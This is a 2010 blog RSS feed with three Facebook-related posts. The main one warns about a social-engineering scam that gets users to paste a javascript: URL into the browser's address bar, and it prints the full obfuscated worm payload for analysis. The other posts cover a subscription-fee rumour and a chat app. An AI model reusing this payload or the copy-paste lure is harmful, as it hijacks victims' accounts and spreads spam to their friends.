<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Infinity-Infinity &#187; facebook</title>
	<atom:link href="http://infinity-infinity.com/tag/facebook/feed/" rel="self" type="application/rss+xml" />
	<link>http://infinity-infinity.com</link>
	<description>A blog and stuff.</description>
	<lastBuildDate>Tue, 01 Jun 2010 21:48:41 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Facebook Exploit &#8230; Social Engineering &amp; Javascript Injection</title>
		<link>http://infinity-infinity.com/2010/05/facebook-exploit-social-engineering-javascript-injection/</link>
		<comments>http://infinity-infinity.com/2010/05/facebook-exploit-social-engineering-javascript-injection/#comments</comments>
		<pubDate>Sun, 30 May 2010 10:09:53 +0000</pubDate>
		<dc:creator>Brendon</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Social Engineering]]></category>

		<guid isPermaLink="false">http://infinity-infinity.com/?p=767</guid>
		<description><![CDATA[This morning I got an e-mail &#8230; the typical &#8220;[Person] suggested you like [Something]&#8221; from Facebook. Typically, this kind of stuff is SPAM; but I checked it out anyways. However, when I got to the page, I didn&#8217;t observe just spam; in fact, I observed a cunning exploitation which allows the page to run whatever [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Finfinity-infinity.com%2F2010%2F05%2Ffacebook-exploit-social-engineering-javascript-injection%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Finfinity-infinity.com%2F2010%2F05%2Ffacebook-exploit-social-engineering-javascript-injection%2F" height="61" width="51" /></a></div><p>This morning I got an e-mail &#8230; the typical &#8220;[Person] suggested you like [Something]&#8221; from <a href="http://facebook.com/">Facebook</a>. Typically, this kind of stuff is SPAM; but I checked it out anyways. However, when I got to the page, I didn&#8217;t observe just spam; in fact, I observed a cunning exploitation which allows the page to run whatever Javascript code it wishes. It uses a combination of social engineering to prompt the user to perform actions to get a &#8216;reward&#8217;. In the process, the user inadvertently executes Javascript code in their browser.</p>
<p>Watch <a href="http://www.youtube.com/watch?v=cAWSpl-QCOA">this video</a> I recorded to see it live in action:</p>
<p><object width="480" height="385"><param name="movie" value="http://www.youtube-nocookie.com/v/cAWSpl-QCOA&#038;hl=en_GB&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube-nocookie.com/v/cAWSpl-QCOA&#038;hl=en_GB&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><span id="more-767"></span></p>
<p>In essence, this is how this exploit works:</p>
<ol>
<li>The user wishes to view a video, and so clicks a &#8216;View video&#8217; button</li>
<li>The user is told that to watch the video, they must perform some certain actions:
<ol>
<li>Click CTRL + C to copy some text</li>
<li>Click ALT + D to select the browser&#8217;s address bar.</li>
<li>Click CTRL + V, and then hit Enter.</li>
</ol>
</li>
</ol>
<p>And that&#8217;s it! The worm has been able to do pretty much whatever it wishes with the user&#8217;s Facebook page.</p>
<p>The code copied to the address bar was this:</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;">javascript<span style="color: #339933;">:</span> <span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">function</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    a <span style="color: #339933;">=</span> <span style="color: #3366CC;">'app110436432334612_jop'</span><span style="color: #339933;">;</span>
    b <span style="color: #339933;">=</span> <span style="color: #3366CC;">'app110436432334612_jode'</span><span style="color: #339933;">;</span>
    ifc <span style="color: #339933;">=</span> <span style="color: #3366CC;">'app110436432334612_ifc'</span><span style="color: #339933;">;</span>
    ifo <span style="color: #339933;">=</span> <span style="color: #3366CC;">'app110436432334612_ifo'</span><span style="color: #339933;">;</span>
    mw <span style="color: #339933;">=</span> <span style="color: #3366CC;">'app110436432334612_mwrapper'</span><span style="color: #339933;">;</span>
    <span style="color: #000066; font-weight: bold;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">function</span> <span style="color: #009900;">&#40;</span>p<span style="color: #339933;">,</span> a<span style="color: #339933;">,</span> c<span style="color: #339933;">,</span> k<span style="color: #339933;">,</span> e<span style="color: #339933;">,</span> r<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
        e <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">function</span> <span style="color: #009900;">&#40;</span>c<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
            <span style="color: #000066; font-weight: bold;">return</span> <span style="color: #009900;">&#40;</span>c <span style="color: #339933;">&lt;</span> a <span style="color: #339933;">?</span> <span style="color: #3366CC;">''</span> <span style="color: #339933;">:</span> e<span style="color: #009900;">&#40;</span>parseInt<span style="color: #009900;">&#40;</span>c <span style="color: #339933;">/</span> a<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span>c <span style="color: #339933;">=</span> c <span style="color: #339933;">%</span> a<span style="color: #009900;">&#41;</span> <span style="color: #339933;">&gt;</span> <span style="color: #CC0000;">35</span> <span style="color: #339933;">?</span> String.<span style="color: #660066;">fromCharCode</span><span style="color: #009900;">&#40;</span>c <span style="color: #339933;">+</span> <span style="color: #CC0000;">29</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> c.<span style="color: #660066;">toString</span><span style="color: #009900;">&#40;</span><span style="color: #CC0000;">36</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
        <span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span>
        <span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #3366CC;">''</span>.<span style="color: #660066;">replace</span><span style="color: #009900;">&#40;</span><span style="color: #009966; font-style: italic;">/^/</span><span style="color: #339933;">,</span> String<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
            <span style="color: #000066; font-weight: bold;">while</span> <span style="color: #009900;">&#40;</span>c<span style="color: #339933;">--</span><span style="color: #009900;">&#41;</span> r<span style="color: #009900;">&#91;</span>e<span style="color: #009900;">&#40;</span>c<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> k<span style="color: #009900;">&#91;</span>c<span style="color: #009900;">&#93;</span> <span style="color: #339933;">||</span> e<span style="color: #009900;">&#40;</span>c<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
            k <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span><span style="color: #003366; font-weight: bold;">function</span> <span style="color: #009900;">&#40;</span>e<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
                <span style="color: #000066; font-weight: bold;">return</span> r<span style="color: #009900;">&#91;</span>e<span style="color: #009900;">&#93;</span>
            <span style="color: #009900;">&#125;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
            e <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">function</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
                <span style="color: #000066; font-weight: bold;">return</span> <span style="color: #3366CC;">'<span style="color: #000099; font-weight: bold;">\\</span>w+'</span>
            <span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span>
            c <span style="color: #339933;">=</span> <span style="color: #CC0000;">1</span>
        <span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span>
        <span style="color: #000066; font-weight: bold;">while</span> <span style="color: #009900;">&#40;</span>c<span style="color: #339933;">--</span><span style="color: #009900;">&#41;</span> <span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>k<span style="color: #009900;">&#91;</span>c<span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> p <span style="color: #339933;">=</span> p.<span style="color: #660066;">replace</span><span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">new</span> RegExp<span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'<span style="color: #000099; font-weight: bold;">\\</span>b'</span> <span style="color: #339933;">+</span> e<span style="color: #009900;">&#40;</span>c<span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #3366CC;">'<span style="color: #000099; font-weight: bold;">\\</span>b'</span><span style="color: #339933;">,</span> <span style="color: #3366CC;">'g'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span> k<span style="color: #009900;">&#91;</span>c<span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
        <span style="color: #000066; font-weight: bold;">return</span> p
    <span style="color: #009900;">&#125;</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'J e=[&quot;<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>F<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>A&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>A<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>f&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>q<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>r<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>K<span style="color: #000099; font-weight: bold;">\\</span>A<span style="color: #000099; font-weight: bold;">\\</span>L<span style="color: #000099; font-weight: bold;">\\</span>t&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>w<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>t<span style="color: #000099; font-weight: bold;">\\</span>t<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>x<span style="color: #000099; font-weight: bold;">\\</span>M<span style="color: #000099; font-weight: bold;">\\</span>N<span style="color: #000099; font-weight: bold;">\\</span>G<span style="color: #000099; font-weight: bold;">\\</span>O&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>y<span style="color: #000099; font-weight: bold;">\\</span>f&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>y<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>h&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>H<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>r<span style="color: #000099; font-weight: bold;">\\</span>f&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>G<span style="color: #000099; font-weight: bold;">\\</span>u<span style="color: #000099; font-weight: bold;">\\</span>y<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>q<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>j&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>x<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>q<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>h&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>H&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>q<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>h&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>t<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>z<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>w<span style="color: #000099; font-weight: bold;">\\</span>q<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>h&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>v<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>i&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>r<span style="color: #000099; font-weight: bold;">\\</span>v<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>v<span style="color: #000099; font-weight: bold;">\\</span>P<span style="color: #000099; font-weight: bold;">\\</span>u<span style="color: #000099; font-weight: bold;">\\</span>x<span style="color: #000099; font-weight: bold;">\\</span>r&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>B<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>Q<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>R<span style="color: #000099; font-weight: bold;">\\</span>B<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>u<span style="color: #000099; font-weight: bold;">\\</span>p<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>v<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>x<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>z<span style="color: #000099; font-weight: bold;">\\</span>w<span style="color: #000099; font-weight: bold;">\\</span>B<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>k<span style="color: #000099; font-weight: bold;">\\</span>n<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>f<span style="color: #000099; font-weight: bold;">\\</span>v<span style="color: #000099; font-weight: bold;">\\</span>t<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>u<span style="color: #000099; font-weight: bold;">\\</span>o<span style="color: #000099; font-weight: bold;">\\</span>S<span style="color: #000099; font-weight: bold;">\\</span>z<span style="color: #000099; font-weight: bold;">\\</span>w<span style="color: #000099; font-weight: bold;">\\</span>z&quot;,&quot;<span style="color: #000099; font-weight: bold;">\\</span>j<span style="color: #000099; font-weight: bold;">\\</span>y<span style="color: #000099; font-weight: bold;">\\</span>F<span style="color: #000099; font-weight: bold;">\\</span>r<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>h<span style="color: #000099; font-weight: bold;">\\</span>T<span style="color: #000099; font-weight: bold;">\\</span>g<span style="color: #000099; font-weight: bold;">\\</span>l<span style="color: #000099; font-weight: bold;">\\</span>i<span style="color: #000099; font-weight: bold;">\\</span>u<span style="color: #000099; font-weight: bold;">\\</span>o&quot;];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);'</span><span style="color: #339933;">,</span> <span style="color: #CC0000;">62</span><span style="color: #339933;">,</span> <span style="color: #CC0000;">69</span><span style="color: #339933;">,</span> <span style="color: #3366CC;">'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'</span>.<span style="color: #660066;">split</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'|'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span> <span style="color: #CC0000;">0</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#123;</span><span style="color: #009900;">&#125;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#125;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>I&#8217;m currently trying to work out what exactly this code is doing (without executing it). I will post an update when (and if) I figure it out; feel free to comment if you get there before me. I suspect it is a worm.</p>
]]></content:encoded>
			<wfw:commentRss>http://infinity-infinity.com/2010/05/facebook-exploit-social-engineering-javascript-injection/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Facebook to charge £14.99 per month</title>
		<link>http://infinity-infinity.com/2009/12/facebook-to-charge-14-99-per-month/</link>
		<comments>http://infinity-infinity.com/2009/12/facebook-to-charge-14-99-per-month/#comments</comments>
		<pubDate>Tue, 22 Dec 2009 00:05:39 +0000</pubDate>
		<dc:creator>Brendon</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[facebook]]></category>

		<guid isPermaLink="false">http://infinity-infinity.com/?p=615</guid>
		<description><![CDATA[Facebook are to charge £14.99 per month to access the site, in plans to be implemented July next year. Or so a Facebook group says. Now, you would expect the &#8216;average&#8217; person to see that this is a rumour. But over 800,000 members (currently growing strong at 250,000 per day) have signed up to demonstrate [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Finfinity-infinity.com%2F2009%2F12%2Ffacebook-to-charge-14-99-per-month%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Finfinity-infinity.com%2F2009%2F12%2Ffacebook-to-charge-14-99-per-month%2F" height="61" width="51" /></a></div><p><!--<!-no-adsense--> <a href="http://facebook.com">Facebook</a> are to charge £14.99 per month to access the site, in plans to be implemented July next year. Or so a <a href="http://www.facebook.com/group.php?v=wall&amp;gid=387113115536">Facebook group</a> says.<span id="more-615"></span></p>
<p><a href="http://infinity-infinity.com/wp-content/uploads/2009/12/facebook_14.99.png"><img class="aligncenter size-medium wp-image-617" title="facebook_14.99" src="http://infinity-infinity.com/wp-content/uploads/2009/12/facebook_14.99-300x215.png" alt="" width="300" height="215" /></a></p>
<p>Now, you would expect the &#8216;average&#8217; person to see that this is a rumour. But over 800,000 members (currently growing strong at 250,000 per day) have signed up to demonstrate their naïvety. What&#8217;s more is that many people are already making plans to head back to MySpace. Maybe Facebook should put them out of their misery?</p>
<p>Wow.</p>
]]></content:encoded>
			<wfw:commentRss>http://infinity-infinity.com/2009/12/facebook-to-charge-14-99-per-month/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Chat to Strangers on Facebook</title>
		<link>http://infinity-infinity.com/2009/12/chat-to-strangers-on-facebook/</link>
		<comments>http://infinity-infinity.com/2009/12/chat-to-strangers-on-facebook/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 11:38:12 +0000</pubDate>
		<dc:creator>Brendon</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[22talk]]></category>
		<category><![CDATA[chat]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[services]]></category>
		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://infinity-infinity.com/?p=604</guid>
		<description><![CDATA[A few days ago, I was thinking of ways to drive more traffic to 22Talk. Unlike my other websites, 22Talk&#8217;s traffic is more time dependent in that more than 1 user must be online at the same time for it to work at all (and lots more for it to work effectively). I tried StumbleUpon [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Finfinity-infinity.com%2F2009%2F12%2Fchat-to-strangers-on-facebook%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Finfinity-infinity.com%2F2009%2F12%2Fchat-to-strangers-on-facebook%2F" height="61" width="51" /></a></div><p>A few days ago, I was thinking of ways to drive more traffic to <a href="http://22talk.com">22Talk</a>. Unlike my other websites, 22Talk&#8217;s traffic is more time dependent in that more than 1 user must be online at the <em>same</em> time for it to work at all (and lots more for it to work effectively).<span id="more-604"></span></p>
<p>I tried<a href="http://stumbleupon.com"> StumbleUpon Ads</a> a few months ago, and that worked well: I managed to get around 50 simultaneous users online (<em>for about 15 minutes, though</em>). Unfortunately, only a small number of users from these campaigns returned to 22Talk, making the site useless again. And at $0.05 per visitor, I was unable to see how I would re-coup my costs.</p>
<p>But then, on Saturday, I had an epiphany: Rather than drive users to 22Talk, why not drive 22Talk to the users? And then, <a href="http://apps.facebook.com/strangers-chat/">22Talk on Facebook</a> was born. It is more-or-less identical to how 22Talk worked before, but in the more social environment of <a href="http://www.facebook.com/">Facebook</a>. Because of Facebook&#8217;s great <a href="http://developers.facebook.com/">API</a>, I have been able to make the site more user-orientated: If you find someone you like, you can now add them as a friend for life! (You can also go completely Anonymous, if you prefer).</p>
<p>The app is brand new (not in the directory yet). At the moment, you could be waiting a while for a stranger to come along &#8212; but please do wait. Please tell all of your Facebook friends to try it out, <strong>blog about this</strong>, and let&#8217;s see whether we can get enough users to get 22Talk rolling.</p>
<p>Merry Christmas!</p>
]]></content:encoded>
			<wfw:commentRss>http://infinity-infinity.com/2009/12/chat-to-strangers-on-facebook/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
<!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be fixed! -->